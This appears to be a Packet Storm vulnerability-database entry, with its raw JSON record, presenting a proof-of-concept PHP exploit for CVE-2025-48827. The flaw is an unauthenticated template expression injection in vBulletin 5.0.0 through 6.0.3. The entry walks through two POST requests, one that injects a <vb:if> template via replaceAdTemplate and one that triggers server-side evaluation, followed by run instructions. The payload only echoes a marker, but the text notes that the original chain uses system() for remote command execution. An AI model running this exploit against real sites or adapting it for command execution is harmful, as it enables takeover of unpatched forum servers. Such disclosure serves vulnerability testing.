📄 vBulletin 6.0.3 replaceAdTemplate Expression Injection_PACKETSTORM:212107

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

Proof of concept exploit for vBulletin versions 5.0.0 through 6.0.3 for the replaceAdTemplate expression injection vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:212107

Published Nov 26, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : vBulletin 5.0.0 → 6.0.3 replaceAdTemplate Expression Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.vbulletin.com/ |
=============================================================================================================================================

[+] Summary :

A design flaw in vBulletin's AJAX API (`ajax/api/ad/replaceAdTemplate`) allows
unauthenticated attackers to inject arbitrary template conditions that execute
server-side during rendering via `ajax/render/ad_<location>`.

The original exploit chain enables remote command execution via `system()`
wrapped inside template expressions.

The PoC evaluates a harmless PHP expression (`var_dump()`) inside a
template and checks for execution by looking for a unique marker in the output.

[+] References : ( https://packetstorm.news/files/id/200973/ CVE-2025-48827 )

The flaw arises from:

• Misuse of PHP Reflection in vBulletin's API dispatch.
• Missing access control for protected API methods.
• Template engine evaluating embedded PHP conditions inside `<vb:if>`.
• PHP 8.1+ behavior allowing direct invocation of protected methods.

Two unauthenticated requests are used:

1) Inject a custom ad template using `replaceAdTemplate`.
2) Trigger execution by calling `render/ad_<location>`.

If the template condition executes, the response will contain a unique marker.

--------------------------------------------------------------------
### SAFE PHP POC
--------------------------------------------------------------------
<?php
/*
* vBulletin replaceAdTemplate
* by Indoushka — Packet Storm Edition
*/

$target = "http://victim.com/"; // Change to target installation

$marker = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, 6);
$location = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, 6);
$param = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, 6);

$condition = "\"var_dump('$marker')\"";
$template = "<vb:if condition='$condition'></vb:if>";

/* ----------------------------
1) Inject Template
---------------------------- */
$post1 = [
'routestring' => 'ajax/api/ad/replaceAdTemplate',
'styleid' => '1',
'location' => $location,
'template' => $template
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$inj_response = curl_exec($ch);
curl_close($ch);

echo "=== Injection Response ===\n";
echo $inj_response . "\n\n";

/* ----------------------------
2) Trigger Execution
---------------------------- */
$trigger_value = base64_encode($marker);

$post2 = [
'routestring' => "ajax/render/ad_$location",
$param => $trigger_value
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$render_response = curl_exec($ch);
curl_close($ch);

echo "=== Trigger Response ===\n";
echo $render_response . "\n\n";

if (strpos($render_response, $marker) !== false) {
echo "[+] Vulnerable: Marker detected → Template executed.\n";
} else {
echo "[-] Not Vulnerable.\n";
}
?>

------------------------------------------------------------------------------
4. Save & Run Instructions
------------------------------------------------------------------------------

Save the PoC as:
vb_safe_poc.php

Run it using:
php vb_safe_poc.php

If vulnerable, output includes:
[+] Vulnerable: Marker detected …

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-26T18:14:13",
    "description": "Proof of concept exploit for vBulletin versions 5.0.0 through 6.0.3 for the replaceAdTemplate expression injection vulnerability...",
    "published": "2025-11-26T00:00:00",
    "modified": "2025-11-26T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 vBulletin 6.0.3 replaceAdTemplate Expression Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212107",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-48827"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : vBulletin 5.0.0 \u2192 6.0.3 replaceAdTemplate Expression Injection                                                              |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.vbulletin.com/                                                                                                  |\n    =============================================================================================================================================\n    \n    [+] Summary : \n    \n    A design flaw in vBulletin's AJAX API (`ajax/api/ad/replaceAdTemplate`) allows\n    unauthenticated attackers to inject arbitrary template conditions that execute\n    server-side during rendering via `ajax/render/ad_<location>`.\n    \n    The original exploit chain enables remote command execution via `system()`\n    wrapped inside template expressions. \n    \n    The PoC evaluates a harmless PHP expression (`var_dump()`) inside a\n    template and checks for execution by looking for a unique marker in the output.\n    \n    \n    [+] References : ( https://packetstorm.news/files/id/200973/ \tCVE-2025-48827 ) \n    \n    The flaw arises from:\n    \n    \u2022 Misuse of PHP Reflection in vBulletin's API dispatch.  \n    \u2022 Missing access control for protected API methods.  \n    \u2022 Template engine evaluating embedded PHP conditions inside `<vb:if>`.  \n    \u2022 PHP 8.1+ behavior allowing direct invocation of protected methods.\n    \n    Two unauthenticated requests are used:\n    \n    1) Inject a custom ad template using `replaceAdTemplate`.  \n    2) Trigger execution by calling `render/ad_<location>`.\n    \n    If the template condition executes, the response will contain a unique marker.\n    \n    \n    --------------------------------------------------------------------\n    ### SAFE PHP POC\n    --------------------------------------------------------------------\n    <?php\n    /*\n     * vBulletin replaceAdTemplate\n     * by Indoushka \u2014 Packet Storm Edition\n     */\n    \n    $target = \"http://victim.com/\"; // Change to target installation\n    \n    $marker   = substr(str_shuffle(\"abcdefghijklmnopqrstuvwxyz\"), 0, 6);\n    $location = substr(str_shuffle(\"abcdefghijklmnopqrstuvwxyz\"), 0, 6);\n    $param    = substr(str_shuffle(\"abcdefghijklmnopqrstuvwxyz\"), 0, 6);\n    \n    $condition = \"\\\"var_dump('$marker')\\\"\";\n    $template  = \"<vb:if condition='$condition'></vb:if>\";\n    \n    /* ----------------------------\n       1) Inject Template\n       ---------------------------- */\n    $post1 = [\n        'routestring' => 'ajax/api/ad/replaceAdTemplate',\n        'styleid'     => '1',\n        'location'    => $location,\n        'template'    => $template\n    ];\n    \n    $ch = curl_init();\n    curl_setopt($ch, CURLOPT_URL, $target);\n    curl_setopt($ch, CURLOPT_POST, true);\n    curl_setopt($ch, CURLOPT_POSTFIELDS, $post1);\n    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n    $inj_response = curl_exec($ch);\n    curl_close($ch);\n    \n    echo \"=== Injection Response ===\\n\";\n    echo $inj_response . \"\\n\\n\";\n    \n    /* ----------------------------\n       2) Trigger Execution\n       ---------------------------- */\n    $trigger_value = base64_encode($marker);\n    \n    $post2 = [\n        'routestring' => \"ajax/render/ad_$location\",\n        $param        => $trigger_value\n    ];\n    \n    $ch = curl_init();\n    curl_setopt($ch, CURLOPT_URL, $target);\n    curl_setopt($ch, CURLOPT_POST, true);\n    curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);\n    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n    $render_response = curl_exec($ch);\n    curl_close($ch);\n    \n    echo \"=== Trigger Response ===\\n\";\n    echo $render_response . \"\\n\\n\";\n    \n    if (strpos($render_response, $marker) !== false) {\n        echo \"[+] Vulnerable: Marker detected \u2192 Template executed.\\n\";\n    } else {\n        echo \"[-] Not Vulnerable.\\n\";\n    }\n    ?>\n    \n    ------------------------------------------------------------------------------\n    4. Save & Run Instructions\n    ------------------------------------------------------------------------------\n    \n    Save the PoC as:\n        vb_safe_poc.php\n    \n    Run it using:\n        php vb_safe_poc.php\n    \n    If vulnerable, output includes:\n        [+] Vulnerable: Marker detected \u2026\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212107",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212107/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply